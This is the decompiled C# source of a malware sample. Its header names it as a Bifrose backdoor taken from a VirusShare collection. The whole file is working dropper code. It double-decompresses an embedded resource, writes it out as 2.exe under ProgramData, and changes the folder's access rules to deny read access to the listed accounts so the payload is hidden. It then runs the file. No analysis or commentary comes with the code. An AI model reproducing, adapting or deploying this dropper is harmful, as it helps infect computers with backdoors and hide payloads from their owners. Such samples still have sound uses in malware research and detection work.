// Decompiled with JetBrains decompiler
// Type: X
// Assembly: تمويه, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 76455843-6727-42BB-8FC2-E9F414E4C091
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Bifrose.fsi-90ef09667cebbff320fddbf9e767a1c73c3b725572223c760d4d8d4ec8ce1ab1.exe

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Resources;
using System.Security.AccessControl;
using System.Security.Principal;

internal class X
{
  [STAThread]
  public static void main()
  {
    byte[] bytes = X.Z(X.Z((byte[]) new ResourceManager("M", Assembly.GetExecutingAssembly()).GetObject("A")));
    string Path = Interaction.Environ("programdata") + "\\2";
    string str = Path + "\\2.exe";
    try
    {
      FileSystem.MkDir(Path);
    }
    catch (Exception ex)
    {
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
    try
    {
      X.BD(ref Path);
      File.WriteAllBytes(str, bytes);
      Interaction.Shell(str);
    }
    catch (Exception ex)
    {
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
  }

  public static byte[] Z(byte[] Byt)
  {
    MemoryStream memoryStream = new MemoryStream(Byt);
    GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress);
    byte[] buffer = new byte[4];
    memoryStream.Position = checked (memoryStream.Length - 5L);
    memoryStream.Read(buffer, 0, 4);
    int int32 = BitConverter.ToInt32(buffer, 0);
    memoryStream.Position = 0L;
    byte[] array = new byte[checked (int32 - 1 + 1)];
    gzipStream.Read(array, 0, int32);
    gzipStream.Dispose();
    memoryStream.Dispose();
    return array;
  }

  public static void BD(ref string Path)
  {
    DirectorySecurity accessControl1 = Directory.GetAccessControl(Path, AccessControlSections.All);
    try
    {
      foreach (FileSystemAccessRule accessRule in (ReadOnlyCollectionBase) accessControl1.GetAccessRules(true, true, typeof (NTAccount)))
      {
        try
        {
          DirectorySecurity accessControl2 = Directory.GetAccessControl(Path, AccessControlSections.All);
          FileSystemAccessRule rule = new FileSystemAccessRule((IdentityReference) new NTAccount(Strings.Split(accessRule.IdentityReference.Value, "\\")[1]), FileSystemRights.ReadData, AccessControlType.Deny);
          accessControl2.AddAccessRule(rule);
          Directory.SetAccessControl(Path, accessControl2);
        }
        catch (Exception ex)
        {
          ProjectData.SetProjectError(ex);
          ProjectData.ClearProjectError();
        }
      }
    }
    finally
    {
      IEnumerator enumerator;
      if (enumerator is IDisposable)
        (enumerator as IDisposable).Dispose();
    }
  }
}